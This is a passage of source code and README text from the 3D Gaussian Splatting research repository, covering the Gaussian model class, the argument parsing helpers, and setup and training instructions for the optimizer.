nerf_normalization=nerf_normalization, ply_path=ply_path) return scene_info sceneLoadTypeCallbacks = { "Colmap": readColmapSceneInfo, "Blender" : readNerfSyntheticInfo } File: scene/gaussian_model.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. 
# # For inquiries contact [email protected] # import torch import numpy as np from utils.general_utils import inverse_sigmoid, get_expon_lr_func, build_rotation from torch import nn import os from utils.system_utils import mkdir_p from plyfile import PlyData, PlyElement from utils.sh_utils import RGB2SH from simple_knn._C import distCUDA2 from utils.graphics_utils import BasicPointCloud from utils.general_utils import strip_symmetric, build_scaling_rotation class GaussianModel: def setup_functions(self): def build_covariance_from_scaling_rotation(scaling, scaling_modifier, rotation): L = build_scaling_rotation(scaling_modifier * scaling, rotation) actual_covariance = L @ L.transpose(1, 2) symm = strip_symmetric(actual_covariance) return symm self.scaling_activation = torch.exp self.scaling_inverse_activation = torch.log self.covariance_activation = build_covariance_from_scaling_rotation self.opacity_activation = torch.sigmoid self.inverse_opacity_activation = inverse_sigmoid self.rotation_activation = torch.nn.functional.normalize def __init__(self, sh_degree : int): self.active_sh_degree = 0 self.max_sh_degree = sh_degree self._xyz = torch.empty(0) self._features_dc = torch.empty(0) self._features_rest = torch.empty(0) self._scaling = torch.empty(0) self._rotation = torch.empty(0) self._opacity = torch.empty(0) self.max_radii2D = torch.empty(0) self.xyz_gradient_accum = torch.empty(0) self.denom = torch.empty(0) self.optimizer = None self.percent_dense = 0 self.spatial_lr_scale = 0 self.setup_functions() def capture(self): return ( self.active_sh_degree, self._xyz, self._features_dc, self._features_rest, self._scaling, self._rotation, self._opacity, self.max_radii2D, self.xyz_gradient_accum, self.denom, self.optimizer.state_dict(), self.spatial_lr_scale, ) def restore(self, model_args, training_args): (self.active_sh_degree, self._xyz, self._features_dc, self._features_rest, self._scaling, self._rotation, self._opacity, self.max_radii2D, xyz_gradient_accum, denom, opt_dict, self.spatial_lr_scale) = model_args self.training_setup(training_args) self.xyz_gradient_accum = xyz_gradient_accum self.denom = denom self.optimizer.load_state_dict(opt_dict) @property def get_scaling(self): return self.scaling_activation(self._scaling) @property def get_rotation(self): return self.rotation_activation(self._rotation) @property def get_xyz(self): return self._xyz @property def get_features(self): features_dc = self._features_dc features_rest = self._features_rest return torch.cat((features_dc, features_rest), dim=1) @property def get_opacity(self): return self.opacity_activation(self._opacity) def get_covariance(self, scaling_modifier = 1): return self.covariance_activation(self.get_scaling, scaling_modifier, self._rotation) def oneupSHdegree(self): if self.active_sh_degree < self.max_sh_degree: self.active_sh_degree += 1 def create_from_pcd(self, pcd : BasicPointCloud, spatial_lr_scale : float): self.spatial_lr_scale = spatial_lr_scale fused_point_cloud = torch.tensor(np.asarray(pcd.points)).float().cuda() fused_color = RGB2SH(torch.tensor(np.asarray(pcd.colors)).float().cuda()) features = torch.zeros((fused_color.shape[0], 3, (self.max_sh_degree + 1) ** 2)).float().cuda() features[:, :3, 0 ] = fused_color features[:, 3:, 1:] = 0.0 print("Number of points at initialisation : ", fused_point_cloud.shape[0]) dist2 = torch.clamp_min(distCUDA2(torch.from_numpy(np.asarray(pcd.points)).float().cuda()), 0.0000001) scales = torch.log(torch.sqrt(dist2))[...,None].repeat(1, 3) rots = 
torch.zeros((fused_point_cloud.shape[0], 4), device="cuda") rots[:, 0] = 1 opacities = inverse_sigmoid(0.1 * torch.ones((fused_point_cloud.shape[0], 1), dtype=torch.float, device="cuda")) self._xyz = nn.Parameter(fused_point_cloud.requires_grad_(True)) self._features_dc = nn.Parameter(features[:,:,0:1].transpose(1, 2).contiguous().requires_grad_(True)) self._features_rest = nn.Parameter(features[:,:,1:].transpose(1, 2).contiguous().requires_grad_(True)) self._scaling = nn.Parameter(scales.requires_grad_(True)) self._rotation = nn.Parameter(rots.requires_grad_(True)) self._opacity = nn.Parameter(opacities.requires_grad_(True)) self.max_radii2D = torch.zeros((self.get_xyz.shape[0]), device="cuda") def training_setup(self, training_args): self.percent_dense = training_args.percent_dense self.xyz_gradient_accum = torch.zeros((self.get_xyz.shape[0], 1), device="cuda") self.denom = torch.zeros((self.get_xyz.shape[0], 1), device="cuda") l = [ {'params': [self._xyz], 'lr': training_args.position_lr_init * self.spatial_lr_scale, "name": "xyz"}, {'params': [self._features_dc], 'lr': training_args.feature_lr, "name": "f_dc"}, {'params': [self._features_rest], 'lr': training_args.feature_lr / 20.0, "name": "f_rest"}, {'params': [self._opacity], 'lr': training_args.opacity_lr, "name": "opacity"}, {'params': [self._scaling], 'lr': training_args.scaling_lr, "name": "scaling"}, {'params': [self._rotation], 'lr': training_args.rotation_lr, "name": "rotation"} ] self.optimizer = torch.optim.Adam(l, lr=0.0, eps=1e-15) self.xyz_scheduler_args = get_expon_lr_func(lr_init=training_args.position_lr_init*self.spatial_lr_scale, lr_final=training_args.position_lr_final*self.spatial_lr_scale, lr_delay_mult=training_args.position_lr_delay_mult, max_steps=training_args.position_lr_max_steps) def update_learning_rate(self, iteration): ''' Learning rate scheduling per step ''' for param_group in self.optimizer.param_groups: if param_group["name"] == "xyz": lr = self.xyz_scheduler_args(iteration) param_group['lr'] = lr return lr def construct_list_of_attributes(self): l = ['x', 'y', 'z', 'nx', 'ny', 'nz'] # All channels except the 3 DC for i in range(self._features_dc.shape[1]*self._features_dc.shape[2]): l.append('f_dc_{}'.format(i)) for i in range(self._features_rest.shape[1]*self._features_rest.shape[2]): l.append('f_rest_{}'.format(i)) l.append('opacity') for i in range(self._scaling.shape[1]): l.append('scale_{}'.format(i)) for i in range(self._rotation.shape[1]): l.append('rot_{}'.format(i)) return l def save_ply(self, path): mkdir_p(os.path.dirname(path)) xyz = self._xyz.detach().cpu().numpy() normals = np.zeros_like(xyz) f_dc = self._features_dc.detach().transpose(1, 2).flatten(start_dim=1).contiguous().cpu().numpy() f_rest = self._features_rest.detach().transpose(1, 2).flatten(start_dim=1).contiguous().cpu().numpy() opacities = self._opacity.detach().cpu().numpy() scale = self._scaling.detach().cpu().numpy() rotation = self._rotation.detach().cpu().numpy() dtype_full = [(attribute, 'f4') for attribute in self.construct_list_of_attributes()] elements = np.empty(xyz.shape[0], dtype=dtype_full) attributes = np.concatenate((xyz, normals, f_dc, f_rest, opacities, scale, rotation), axis=1) elements[:] = list(map(tuple, attributes)) el = PlyElement.describe(elements, 'vertex') PlyData([el]).write(path) def reset_opacity(self): opacities_new = inverse_sigmoid(torch.min(self.get_opacity, torch.ones_like(self.get_opacity)*0.01)) optimizable_tensors = self.replace_tensor_to_optimizer(opacities_new, "opacity") self._opacity 
= optimizable_tensors["opacity"] def load_ply(self, path): plydata = PlyData.read(path) xyz = np.stack((np.asarray(plydata.elements[0]["x"]), np.asarray(plydata.elements[0]["y"]), np.asarray(plydata.elements[0]["z"])), axis=1) opacities = np.asarray(plydata.elements[0]["opacity"])[..., np.newaxis] features_dc = np.zeros((xyz.shape[0], 3, 1)) features_dc[:, 0, 0] = np.asarray(plydata.elements[0]["f_dc_0"]) features_dc[:, 1, 0] = np.asarray(plydata.elements[0]["f_dc_1"]) features_dc[:, 2, 0] = np.asarray(plydata.elements[0]["f_dc_2"]) extra_f_names = [p.name for p in plydata.elements[0].properties if p.name.startswith("f_rest_")] extra_f_names = sorted(extra_f_names, key = lambda x: int(x.split('_')[-1])) assert len(extra_f_names)==3*(self.max_sh_degree + 1) ** 2 - 3 features_extra = np.zeros((xyz.shape[0], len(extra_f_names))) for idx, attr_name in enumerate(extra_f_names): features_extra[:, idx] = np.asarray(plydata.elements[0][attr_name]) # Reshape (P,F*SH_coeffs) to (P, F, SH_coeffs except DC) features_extra = features_extra.reshape((features_extra.shape[0], 3, (self.max_sh_degree + 1) ** 2 - 1)) scale_names = [p.name for p in plydata.elements[0].properties if p.name.startswith("scale_")] scale_names = sorted(scale_names, key = lambda x: int(x.split('_')[-1])) scales = np.zeros((xyz.shape[0], len(scale_names))) for idx, attr_name in enumerate(scale_names): scales[:, idx] = np.asarray(plydata.elements[0][attr_name]) rot_names = [p.name for p in plydata.elements[0].properties if p.name.startswith("rot")] rot_names = sorted(rot_names, key = lambda x: int(x.split('_')[-1])) rots = np.zeros((xyz.shape[0], len(rot_names))) for idx, attr_name in enumerate(rot_names): rots[:, idx] = np.asarray(plydata.elements[0][attr_name]) self._xyz = nn.Parameter(torch.tensor(xyz, dtype=torch.float, device="cuda").requires_grad_(True)) self._features_dc = nn.Parameter(torch.tensor(features_dc, dtype=torch.float, device="cuda").transpose(1, 2).contiguous().requires_grad_(True)) self._features_rest = nn.Parameter(torch.tensor(features_extra, dtype=torch.float, device="cuda").transpose(1, 2).contiguous().requires_grad_(True)) self._opacity = nn.Parameter(torch.tensor(opacities, dtype=torch.float, device="cuda").requires_grad_(True)) self._scaling = nn.Parameter(torch.tensor(scales, dtype=torch.float, device="cuda").requires_grad_(True)) self._rotation = nn.Parameter(torch.tensor(rots, dtype=torch.float, device="cuda").requires_grad_(True)) self.active_sh_degree = self.max_sh_degree def replace_tensor_to_optimizer(self, tensor, name): optimizable_tensors = {} for group in self.optimizer.param_groups: if group["name"] == name: stored_state = self.optimizer.state.get(group['params'][0], None) stored_state["exp_avg"] = torch.zeros_like(tensor) stored_state["exp_avg_sq"] = torch.zeros_like(tensor) del self.optimizer.state[group['params'][0]] group["params"][0] = nn.Parameter(tensor.requires_grad_(True)) self.optimizer.state[group['params'][0]] = stored_state optimizable_tensors[group["name"]] = group["params"][0] return optimizable_tensors def _prune_optimizer(self, mask): optimizable_tensors = {} for group in self.optimizer.param_groups: stored_state = self.optimizer.state.get(group['params'][0], None) if stored_state is not None: stored_state["exp_avg"] = stored_state["exp_avg"][mask] stored_state["exp_avg_sq"] = stored_state["exp_avg_sq"][mask] del self.optimizer.state[group['params'][0]] group["params"][0] = nn.Parameter((group["params"][0][mask].requires_grad_(True))) self.optimizer.state[group['params'][0]] = 
stored_state optimizable_tensors[group["name"]] = group["params"][0] else: group["params"][0] = nn.Parameter(group["params"][0][mask].requires_grad_(True)) optimizable_tensors[group["name"]] = group["params"][0] return optimizable_tensors def prune_points(self, mask): valid_points_mask = ~mask optimizable_tensors = self._prune_optimizer(valid_points_mask) self._xyz = optimizable_tensors["xyz"] self._features_dc = optimizable_tensors["f_dc"] self._features_rest = optimizable_tensors["f_rest"] self._opacity = optimizable_tensors["opacity"] self._scaling = optimizable_tensors["scaling"] self._rotation = optimizable_tensors["rotation"] self.xyz_gradient_accum = self.xyz_gradient_accum[valid_points_mask] self.denom = self.denom[valid_points_mask] self.max_radii2D = self.max_radii2D[valid_points_mask] def cat_tensors_to_optimizer(self, tensors_dict): optimizable_tensors = {} for group in self.optimizer.param_groups: assert len(group["params"]) == 1 extension_tensor = tensors_dict[group["name"]] stored_state = self.optimizer.state.get(group['params'][0], None) if stored_state is not None: stored_state["exp_avg"] = torch.cat((stored_state["exp_avg"], torch.zeros_like(extension_tensor)), dim=0) stored_state["exp_avg_sq"] = torch.cat((stored_state["exp_avg_sq"], torch.zeros_like(extension_tensor)), dim=0) del self.optimizer.state[group['params'][0]] group["params"][0] = nn.Parameter(torch.cat((group["params"][0], extension_tensor), dim=0).requires_grad_(True)) self.optimizer.state[group['params'][0]] = stored_state optimizable_tensors[group["name"]] = group["params"][0] else: group["params"][0] = nn.Parameter(torch.cat((group["params"][0], extension_tensor), dim=0).requires_grad_(True)) optimizable_tensors[group["name"]] = group["params"][0] return optimizable_tensors def densification_postfix(self, new_xyz, new_features_dc, new_features_rest, new_opacities, new_scaling, new_rotation): d = {"xyz": new_xyz, "f_dc": new_features_dc, "f_rest": new_features_rest, "opacity": new_opacities, "scaling" : new_scaling, "rotation" : new_rotation} optimizable_tensors = self.cat_tensors_to_optimizer(d) self._xyz = optimizable_tensors["xyz"] self._features_dc = optimizable_tensors["f_dc"] self._features_rest = optimizable_tensors["f_rest"] self._opacity = optimizable_tensors["opacity"] self._scaling = optimizable_tensors["scaling"] self._rotation = optimizable_tensors["rotation"] self.xyz_gradient_accum = torch.zeros((self.get_xyz.shape[0], 1), device="cuda") self.denom = torch.zeros((self.get_xyz.shape[0], 1), device="cuda") self.max_radii2D = torch.zeros((self.get_xyz.shape[0]), device="cuda") def densify_and_split(self, grads, grad_threshold, scene_extent, N=2): n_init_points = self.get_xyz.shape[0] # Extract points that satisfy the gradient condition padded_grad = torch.zeros((n_init_points), device="cuda") padded_grad[:grads.shape[0]] = grads.squeeze() selected_pts_mask = torch.where(padded_grad >= grad_threshold, True, False) selected_pts_mask = torch.logical_and(selected_pts_mask, torch.max(self.get_scaling, dim=1).values > self.percent_dense*scene_extent) stds = self.get_scaling[selected_pts_mask].repeat(N,1) means =torch.zeros((stds.size(0), 3),device="cuda") samples = torch.normal(mean=means, std=stds) rots = build_rotation(self._rotation[selected_pts_mask]).repeat(N,1,1) new_xyz = torch.bmm(rots, samples.unsqueeze(-1)).squeeze(-1) + self.get_xyz[selected_pts_mask].repeat(N, 1) new_scaling = self.scaling_inverse_activation(self.get_scaling[selected_pts_mask].repeat(N,1) / (0.8*N)) new_rotation = 
self._rotation[selected_pts_mask].repeat(N,1) new_features_dc = self._features_dc[selected_pts_mask].repeat(N,1,1) new_features_rest = self._features_rest[selected_pts_mask].repeat(N,1,1) new_opacity = self._opacity[selected_pts_mask].repeat(N,1) self.densification_postfix(new_xyz, new_features_dc, new_features_rest, new_opacity, new_scaling, new_rotation) prune_filter = torch.cat((selected_pts_mask, torch.zeros(N * selected_pts_mask.sum(), device="cuda", dtype=bool))) self.prune_points(prune_filter) def densify_and_clone(self, grads, grad_threshold, scene_extent): # Extract points that satisfy the gradient condition selected_pts_mask = torch.where(torch.norm(grads, dim=-1) >= grad_threshold, True, False) selected_pts_mask = torch.logical_and(selected_pts_mask, torch.max(self.get_scaling, dim=1).values <= self.percent_dense*scene_extent) new_xyz = self._xyz[selected_pts_mask] new_features_dc = self._features_dc[selected_pts_mask] new_features_rest = self._features_rest[selected_pts_mask] new_opacities = self._opacity[selected_pts_mask] new_scaling = self._scaling[selected_pts_mask] new_rotation = self._rotation[selected_pts_mask] self.densification_postfix(new_xyz, new_features_dc, new_features_rest, new_opacities, new_scaling, new_rotation) def densify_and_prune(self, max_grad, min_opacity, extent, max_screen_size): grads = self.xyz_gradient_accum / self.denom grads[grads.isnan()] = 0.0 self.densify_and_clone(grads, max_grad, extent) self.densify_and_split(grads, max_grad, extent) prune_mask = (self.get_opacity < min_opacity).squeeze() if max_screen_size: big_points_vs = self.max_radii2D > max_screen_size big_points_ws = self.get_scaling.max(dim=1).values > 0.1 * extent prune_mask = torch.logical_or(torch.logical_or(prune_mask, big_points_vs), big_points_ws) self.prune_points(prune_mask) torch.cuda.empty_cache() def add_densification_stats(self, viewspace_point_tensor, update_filter): self.xyz_gradient_accum[update_filter] += torch.norm(viewspace_point_tensor.grad[update_filter,:2], dim=-1, keepdim=True) self.denom[update_filter] += 1 File: arguments/__init__.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. 
# # For inquiries contact [email protected] # from argparse import ArgumentParser, Namespace import sys import os class GroupParams: pass class ParamGroup: def __init__(self, parser: ArgumentParser, name : str, fill_none = False): group = parser.add_argument_group(name) for key, value in vars(self).items(): shorthand = False if key.startswith("_"): shorthand = True key = key[1:] t = type(value) value = value if not fill_none else None if shorthand: if t == bool: group.add_argument("--" + key, ("-" + key[0:1]), default=value, action="store_true") else: group.add_argument("--" + key, ("-" + key[0:1]), default=value, type=t) else: if t == bool: group.add_argument("--" + key, default=value, action="store_true") else: group.add_argument("--" + key, default=value, type=t) def extract(self, args): group = GroupParams() for arg in vars(args).items(): if arg[0] in vars(self) or ("_" + arg[0]) in vars(self): setattr(group, arg[0], arg[1]) return group class ModelParams(ParamGroup): def __init__(self, parser, sentinel=False): self.sh_degree = 3 self._source_path = "" self._model_path = "" self._images = "images" self._resolution = -1 self._white_background = False self.data_device = "cuda" self.eval = False super().__init__(parser, "Loading Parameters", sentinel) def extract(self, args): g = super().extract(args) g.source_path = os.path.abspath(g.source_path) return g class PipelineParams(ParamGroup): def __init__(self, parser): self.convert_SHs_python = False self.compute_cov3D_python = False self.debug = False super().__init__(parser, "Pipeline Parameters") class OptimizationParams(ParamGroup): def __init__(self, parser): self.iterations = 30_000 self.position_lr_init = 0.00016 self.position_lr_final = 0.0000016 self.position_lr_delay_mult = 0.01 self.position_lr_max_steps = 30_000 self.feature_lr = 0.0025 self.opacity_lr = 0.05 self.scaling_lr = 0.005 self.rotation_lr = 0.001 self.percent_dense = 0.01 self.lambda_dssim = 0.2 self.densification_interval = 100 self.opacity_reset_interval = 3000 self.densify_from_iter = 500 self.densify_until_iter = 15_000 self.densify_grad_threshold = 0.0002 self.random_background = False super().__init__(parser, "Optimization Parameters") def get_combined_args(parser : ArgumentParser): cmdlne_string = sys.argv[1:] cfgfile_string = "Namespace()" args_cmdline = parser.parse_args(cmdlne_string) try: cfgfilepath = os.path.join(args_cmdline.model_path, "cfg_args") print("Looking for config file in", cfgfilepath) with open(cfgfilepath) as cfg_file: print("Config file found: {}".format(cfgfilepath)) cfgfile_string = cfg_file.read() except TypeError: print("Config file not found at") pass args_cfgfile = eval(cfgfile_string) merged_dict = vars(args_cfgfile).copy() for k,v in vars(args_cmdline).items(): if v != None: merged_dict[k] = v return Namespace(**merged_dict)
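
The `ParamGroup` base class above turns the attributes of `ModelParams`, `PipelineParams`, and `OptimizationParams` into command-line flags automatically: a leading underscore additionally registers a one-letter shorthand (e.g. `_source_path` becomes `--source_path`/`-s`), and `bool` attributes become `store_true` flags. Below is a minimal usage sketch, not a file from this repository; it assumes the repository root is on `PYTHONPATH`, and the paths on the example command line are placeholders.

```python
# Hypothetical driver sketch showing how the parameter groups defined in
# arguments/__init__.py attach themselves to a single ArgumentParser.
from argparse import ArgumentParser

from arguments import ModelParams, OptimizationParams, PipelineParams

parser = ArgumentParser(description="Parameter-group usage sketch")
lp = ModelParams(parser)         # adds --source_path/-s, --model_path/-m, --images/-i, --resolution/-r, ...
op = OptimizationParams(parser)  # adds --iterations, --position_lr_init, --densify_grad_threshold, ...
pp = PipelineParams(parser)      # adds --convert_SHs_python, --compute_cov3D_python, --debug

# Placeholder command line; --eval is a store_true flag generated from the bool attribute.
args = parser.parse_args(["-s", "/data/my_scene", "-m", "./output/my_scene", "--eval"])

dataset = lp.extract(args)       # GroupParams with source_path (made absolute), model_path, eval, ...
opt = op.extract(args)
pipe = pp.extract(args)
print(dataset.source_path, dataset.eval, opt.iterations, pipe.debug)
```

`get_combined_args` follows the same pattern for downstream scripts, except that it first looks for a `cfg_args` file in the model directory and lets explicit command-line values override whatever it finds there.
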
# 3D Gaussian Splatting for Real-Time Radiance Field Rendering Bernhard Kerbl*, Georgios Kopanas*, Thomas Leimkühler, George Drettakis (* indicates equal contribution)<br> | [Webpage](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/) | [Full Paper](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/3d_gaussian_splatting_high.pdf) | [Video](https://youtu.be/T_kXY43VZnk) | [Other GRAPHDECO Publications](http://www-sop.inria.fr/reves/publis/gdindex.php) | [FUNGRAPH project page](https://fungraph.inria.fr) |<br> | [T&T+DB COLMAP (650MB)](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/datasets/input/tandt_db.zip) | [Pre-trained Models (14 GB)](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/datasets/pretrained/models.zip) | [Viewers for Windows (60MB)](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/binaries/viewers.zip) | [Evaluation Images (7 GB)](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/evaluation/images.zip) |<br> ![Teaser image](assets/teaser.png) This repository contains the official authors implementation associated with the paper "3D Gaussian Splatting for Real-Time Radiance Field Rendering", which can be found [here](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/). We further provide the reference images used to create the error metrics reported in the paper, as well as recently created, pre-trained models. <a href="https://www.inria.fr/"><img height="100" src="assets/logo_inria.png"> </a> <a href="https://univ-cotedazur.eu/"><img height="100" src="assets/logo_uca.png"> </a> <a href="https://www.mpi-inf.mpg.de"><img height="100" src="assets/logo_mpi.png"> </a> <a href="https://team.inria.fr/graphdeco/"> <img style="width:100%;" src="assets/logo_graphdeco.png"></a> Abstract: *Radiance Field methods have recently revolutionized novel-view synthesis of scenes captured with multiple photos or videos. However, achieving high visual quality still requires neural networks that are costly to train and render, while recent faster methods inevitably trade off speed for quality. For unbounded and complete scenes (rather than isolated objects) and 1080p resolution rendering, no current method can achieve real-time display rates. We introduce three key elements that allow us to achieve state-of-the-art visual quality while maintaining competitive training times and importantly allow high-quality real-time (≥ 30 fps) novel-view synthesis at 1080p resolution. First, starting from sparse points produced during camera calibration, we represent the scene with 3D Gaussians that preserve desirable properties of continuous volumetric radiance fields for scene optimization while avoiding unnecessary computation in empty space; Second, we perform interleaved optimization/density control of the 3D Gaussians, notably optimizing anisotropic covariance to achieve an accurate representation of the scene; Third, we develop a fast visibility-aware rendering algorithm that supports anisotropic splatting and both accelerates training and allows realtime rendering. 
We demonstrate state-of-the-art visual quality and real-time rendering on several established datasets.* <section class="section" id="BibTeX"> <div class="container is-max-desktop content"> <h2 class="title">BibTeX</h2> <pre><code>@Article{kerbl3Dgaussians, author = {Kerbl, Bernhard and Kopanas, Georgios and Leimk{\"u}hler, Thomas and Drettakis, George}, title = {3D Gaussian Splatting for Real-Time Radiance Field Rendering}, journal = {ACM Transactions on Graphics}, number = {4}, volume = {42}, month = {July}, year = {2023}, url = {https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/} }</code></pre> </div> </section> ## Funding and Acknowledgments This research was funded by the ERC Advanced grant FUNGRAPH No 788065. The authors are grateful to Adobe for generous donations, the OPAL infrastructure from Université Côte d’Azur and for the HPC resources from GENCI–IDRIS (Grant 2022-AD011013409). The authors thank the anonymous reviewers for their valuable feedback, P. Hedman and A. Tewari for proofreading earlier drafts also T. Müller, A. Yu and S. Fridovich-Keil for helping with the comparisons. ## Step-by-step Tutorial Jonathan Stephens made a fantastic step-by-step tutorial for setting up Gaussian Splatting on your machine, along with instructions for creating usable datasets from videos. If the instructions below are too dry for you, go ahead and check it out [here](https://www.youtube.com/watch?v=UXtuigy_wYc). ## Colab User [camenduru](https://github.com/camenduru) was kind enough to provide a Colab template that uses this repo's source (status: August 2023!) for quick and easy access to the method. Please check it out [here](https://github.com/camenduru/gaussian-splatting-colab). ## Cloning the Repository The repository contains submodules, thus please check it out with ```shell # SSH git clone [email protected]:graphdeco-inria/gaussian-splatting.git --recursive ``` or ```shell # HTTPS git clone https://github.com/graphdeco-inria/gaussian-splatting --recursive ``` ## Overview The codebase has 4 main components: - A PyTorch-based optimizer to produce a 3D Gaussian model from SfM inputs - A network viewer that allows to connect to and visualize the optimization process - An OpenGL-based real-time viewer to render trained models in real-time. - A script to help you turn your own images into optimization-ready SfM data sets The components have different requirements w.r.t. both hardware and software. They have been tested on Windows 10 and Ubuntu Linux 22.04. Instructions for setting up and running each of them are found in the sections below. ## NEW FEATURES ! We have limited resources for maintaining and updating the code. However, we have added a few new features since the original release that are inspired by some of the excellent work many other researchers have been doing on 3DGS. We will be adding other features within the ability of our resources. Update of Sept. 3rd 2024: We placed the new features in the `dev` branch until we have finished resolving the following issues: [#955](https://github.com/graphdeco-inria/gaussian-splatting/issues/955), [#962](https://github.com/graphdeco-inria/gaussian-splatting/issues/962). Update of August 2024: We have added/corrected the following features: [Depth regularization](#depth-regularization) for training, [anti aliasing](#anti-aliasing) and [exposure compensation](#exposure-compensation). 
We have enhanced the SIBR real time viewer by correcting bugs and adding features in the [Top View](#sibr:-top-view) that allows visualization of input and user cameras. Please note that it is currently not possible to use depth regularization with the training speed acceleration since they use different rasterizer versions. Update of Spring 2024: Orange Labs has kindly added [OpenXR support](#openXR-support) for VR viewing. ## Optimizer The optimizer uses PyTorch and CUDA extensions in a Python environment to produce trained models. ### Hardware Requirements - CUDA-ready GPU with Compute Capability 7.0+ - 24 GB VRAM (to train to paper evaluation quality) - Please see FAQ for smaller VRAM configurations ### Software Requirements - Conda (recommended for easy setup) - C++ Compiler for PyTorch extensions (we used Visual Studio 2019 for Windows) - CUDA SDK 11 for PyTorch extensions, install *after* Visual Studio (we used 11.8, **known issues with 11.6**) - C++ Compiler and CUDA SDK must be compatible ### Setup #### Local Setup Our default, provided install method is based on Conda package and environment management: ```shell SET DISTUTILS_USE_SDK=1 # Windows only conda env create --file environment.yml conda activate gaussian_splatting ``` Please note that this process assumes that you have CUDA SDK **11** installed, not **12**. For modifications, see below. Tip: Downloading packages and creating a new environment with Conda can require a significant amount of disk space. By default, Conda will use the main system hard drive. You can avoid this by specifying a different package download location and an environment on a different drive: ```shell conda config --add pkgs_dirs <Drive>/<pkg_path> conda env create --file environment.yml --prefix <Drive>/<env_path>/gaussian_splatting conda activate <Drive>/<env_path>/gaussian_splatting ``` #### Modifications If you can afford the disk space, we recommend using our environment files for setting up a training environment identical to ours. If you want to make modifications, please note that major version changes might affect the results of our method. However, our (limited) experiments suggest that the codebase works just fine inside a more up-to-date environment (Python 3.8, PyTorch 2.0.0, CUDA 12). Make sure to create an environment where PyTorch and its CUDA runtime version match and the installed CUDA SDK has no major version difference with PyTorch's CUDA version. #### Known Issues Some users experience problems building the submodules on Windows (```cl.exe: File not found``` or similar). Please consider the workaround for this problem from the FAQ. ### Running To run the optimizer, simply use ```shell python train.py -s <path to COLMAP or NeRF Synthetic dataset> ``` <details> <summary><span style="font-weight: bold;">Command Line Arguments for train.py</span></summary> #### --source_path / -s Path to the source directory containing a COLMAP or Synthetic NeRF data set. #### --model_path / -m Path where the trained model should be stored (```output/<random>``` by default). #### --images / -i Alternative subdirectory for COLMAP images (```images``` by default). #### --eval Add this flag to use a MipNeRF360-style training/test split for evaluation. #### --resolution / -r Specifies resolution of the loaded images before training. If provided ```1, 2, 4``` or ```8```, uses original, 1/2, 1/4 or 1/8 resolution, respectively. For all other values, rescales the width to the given number while maintaining image aspect. 
**If not set and input image width exceeds 1.6K pixels, inputs are automatically rescaled to this target.**
#### --data_device
Specifies where to put the source image data, ```cuda``` by default. Using ```cpu``` is recommended when training on large/high-resolution datasets; it reduces VRAM consumption but slightly slows down training. Thanks to [HrsPythonix](https://github.com/HrsPythonix).
#### --white_background / -w
Add this flag to use a white background instead of black (default), e.g., for evaluation of the NeRF Synthetic dataset.
#### --sh_degree
Order of spherical harmonics to be used (no larger than 3). ```3``` by default.
#### --convert_SHs_python
Flag to make the pipeline compute the forward and backward of the SHs with PyTorch instead of ours.
#### --convert_cov3D_python
Flag to make the pipeline compute the forward and backward of the 3D covariance with PyTorch instead of ours.
#### --debug
Enables debug mode if you experience errors. If the rasterizer fails, a ```dump``` file is created that you may forward to us in an issue so we can take a look.
#### --debug_from
Debugging is **slow**. You may specify an iteration (starting from 0) after which the above debugging becomes active.
#### --iterations
Number of total iterations to train for, ```30_000``` by default.
#### --ip
IP to start GUI server on, ```127.0.0.1``` by default.
#### --port
Port to use for GUI server, ```6009``` by default.
#### --test_iterations
Space-separated iterations at which the training script computes L1 and PSNR over the test set, ```7000 30000``` by default.
#### --save_iterations
Space-separated iterations at which the training script saves the Gaussian model, ```7000 30000 <iterations>``` by default.
#### --checkpoint_iterations
Space-separated iterations at which to store a checkpoint for continuing later, saved in the model directory.
#### --start_checkpoint
Path to a saved checkpoint to continue training from.
#### --quiet
Flag to omit any text written to the standard out pipe.
#### --feature_lr
Spherical harmonics features learning rate, ```0.0025``` by default.
#### --opacity_lr
Opacity learning rate, ```0.05``` by default.
#### --scaling_lr
Scaling learning rate, ```0.005``` by default.
#### --rotation_lr
Rotation learning rate, ```0.001``` by default.
#### --position_lr_max_steps
Number of steps (from 0) where the position learning rate goes from ```initial``` to ```final```. ```30_000``` by default.
#### --position_lr_init
Initial 3D position learning rate, ```0.00016``` by default.
#### --position_lr_final
Final 3D position learning rate, ```0.0000016``` by default.
#### --position_lr_delay_mult
Position learning rate multiplier (cf. Plenoxels), ```0.01``` by default.
#### --densify_from_iter
Iteration where densification starts, ```500``` by default.
#### --densify_until_iter
Iteration where densification stops, ```15_000``` by default.
#### --densify_grad_threshold
Limit that decides if points should be densified based on 2D position gradient, ```0.0002``` by default.
#### --densification_interval
How frequently to densify, ```100``` (every 100 iterations) by default.
#### --opacity_reset_interval
How frequently to reset opacity, ```3_000``` by default.
#### --lambda_dssim
Influence of SSIM on the total loss from 0 to 1, ```0.2``` by default.
#### --percent_dense
Percentage of scene extent (0--1) a point must exceed to be forcibly densified, ```0.01``` by default.

</details>
<br>

Note that similar to MipNeRF360, we target images at resolutions in the 1-1.6K pixel range.
For convenience, arbitrary-size inputs can be passed and will be automatically resized if their width exceeds 1600 pixels. We recommend to keep this behavior, but you may force training to use your higher-resolution images by setting ```-r 1```. The MipNeRF360 scenes are hosted by the paper authors [here](https://jonbarron.info/mipnerf360/). You can find our SfM data sets for Tanks&Temples and Deep Blending [here](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/datasets/input/tandt_db.zip). If you do not provide an output model directory (```-m```), trained models are written to folders with randomized unique names inside the ```output``` directory. At this point, the trained models may be viewed with the real-time viewer (see further below). ### Evaluation By default, the trained models use all available images in the dataset. To train them while withholding a test set for evaluation, use the ```--eval``` flag. This way, you can render training/test sets and produce error metrics as follows: ```shell python train.py -s <path to COLMAP or NeRF Synthetic dataset> --eval # Train with train/test split python render.py -m <path to trained model> # Generate renderings python metrics.py -m <path to trained model> # Compute error metrics on renderings ``` If you want to evaluate our [pre-trained 